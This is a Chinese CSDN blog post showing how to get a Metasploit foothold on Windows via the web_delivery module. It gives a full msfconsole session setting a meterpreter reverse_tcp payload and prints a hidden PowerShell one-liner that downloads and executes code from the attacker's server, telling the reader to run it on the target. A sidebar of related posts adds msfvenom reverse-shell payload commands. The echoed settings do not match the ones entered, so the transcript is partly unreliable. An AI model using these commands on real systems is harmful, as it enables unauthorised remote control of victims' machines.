msf 上线方法

最新推荐文章于 2024-06-17 16:20:46 发布
最新推荐文章于 2024-06-17 16:20:46 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: 内网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/118030893
版权

首先选中模块

use exploit/multi/script/web_delivery

root@kali:~# msfconsole
 
msf  >  use exploit/multi/script/web_delivery
msf exploit(web_delivery) >  set target 2
target => 2
msf exploit(web_delivery) >  set payload windows/x64/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
 
msf exploit(web_delivery) > set lhost 192.168.4.95
lhost => 192.168.17.131
msf exploit(web_delivery) > set lport 9999
lport => 9999
msf exploit(web_delivery) > set srvport 8888
srvport => 8888
msf exploit(web_delivery) > set uripath /
uripath => /
 
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
 
[*] Started reverse TCP handler on 192.168.4.95:9999
[*] Using URL: http://0.0.0.0:8888/
[*] Local IP: http://192.168.4.95:8888/
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.4.95:8888/');

复制代码上传至目标,即可返回shell。

multi4
关注
专栏目录
msf端口转发上线
m0_53087192的博客
01-14 711
环境 攻击机:kali ip192.168.50.232 被攻击机:win7 开通转发隧道 注册地址:http://www.ngrok.cc msf木马生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=64.69.43.xx LPORT=10151 -f exe > reverse.exe IP地址为中转服务器ip,端口为中专服务器端口,如下图。 开启转发并设置监听 在网站下载linux客户端,开启转发。 ./sunny clientid
MSF上线到提权
m0_53087192的博客
01-07 1082
环境 攻击机:kali ip:192.168.232.129 被攻击机:win7 ip:192.168.232.140 MSF木马生成 windows_x86_payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.129 LPORT=4444 -f exe > shell.exe windows_x64_payload msfvenom -p windows/x64/meterpreter/reverse_tcp
利用msf实现windows的上线与提权
weixin_52049485的博客
01-07 1695
环境部署 攻击机:Kali ip:192.168.208.138 靶机:Win7(x64) ip:192.168.208.142 Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.138 LPORT=6666 -f exe > reverse.exe 开启监听 use exploit/mult
Kali利用msf渗透Windows电脑(超详细)
最新发布
wholeliubei的博客
06-17 2138
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2605
一条命令上线MSF(Metasploit)-web_delivery模块
MSF&Powershell钓鱼攻击
p01son的博客
06-02 361
Powershell是windows下面非常强大的命令行工具,Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。
MSF 上线linux
03-18
下面是一种常见的上线Linux主机的方法: 1. 扫描目标:使用MSF中的扫描模块,如nmap或auxiliary/scanner/tcp/syn扫描器,来确定目标主机的开放端口和服务。 2. 选择合适的漏洞利用模块:根据目标主机的开放端口和...
msf上线Windows
08-20
在Windows系统上,可以使用msf框架(Metasploit)来进行上线。通过msf框架,可以实现与被控主机的远程连接。具体的方法可以参考相关的博客文章。其中提到了使用web_delivery模块,可以通过一条powershell命令直接上线...
msf上线Windows实战
08-21
- *3* [MSF上线](https://blog.csdn.net/weixin_51151498/article/details/129542091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_...
【漏洞利用框架】Metasploit常用命令
ssrf
12-14 2575
目录一、MSF终端命令0x001、数据库初始化0x002、启动msf0x003、connect0x004、show0x005、search0x006、use命令0x007、msf反弹shell后的乱码问题0x008、hosts0x009、services0x010、更多MSF终端命令二、Meterpreter命令三、MSF payload命令四、MSFencode命令五、MSFcli命令六、Metasploit高级忍术七、MSFvenom八、Meterpreter后渗透攻击阶段命令 一、MSF终端命令
上线MSF(Metasploit)的几种常见方式
qq_46258964的博客
04-14 9510
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 3710
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
MSF使用1
xhscxj的博客
06-12 3500
进入kali中文件,将原有的源注释掉,换上清华的源 进行更新msf:辅助模块,辅助渗透(端口扫描、登录密码爆破、漏洞验证等) :漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。命名规则:操作系统/各种应用协议分类 :攻击载荷,主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码 :后渗透阶段模块,漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等 :编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过
python调用msfconsole全自动永恒之蓝攻击_MSF之ms17-010永恒之蓝漏洞利用
weixin_29775479的博客
02-04 1026
MSF之ms17-010永恒之蓝漏洞利用准备扫描漏洞漏洞攻击准备实验准备环境:被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙)攻击机:虚拟机kali系统,其IP为:192.168.207.130攻击工具:kali自带的msfconsole工具扫描漏洞在kali终端中输入msfconsolemsf >use auxiliary/scanner/smb/sm...
msf命令
qq_52469895的博客
05-19 2232
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
msfconsole 控制台使用和操作
热门推荐
xianjie0318的博客
08-07 2万+
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于...
MSF上线
weixin_51151498的博客
03-16 1162
MSF上线
Metasploit用户接口(MSF终端、MSF命令行、Armitage)
WEL测试
08-29 5928
2.2Metasploit用户接口          Metasploit软件为它基础功能提供了多个用户接口,包括终端、命令行、图像化界面等。除了这些接口,功能程序(utilities)则提供了对Metasploit框架中内部功能的直接访问。 2.2.1 MSF终端          MSF终端(msfconsole)是目前Metasploit框架最为流行的用户接口,而且MSF终端是Met
metaspolit 安装后无法启动命令行msfcli的解决方法
earthfans的专栏
07-10 4943
1246  sudo bundle install  1253  sudo apt-get install postgresql  1261  ./msfcli  1262  sudo bundle install  1263  sudo gem install bcrypt  1264  gem list  1265  gem install mkmf  1266  sudo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值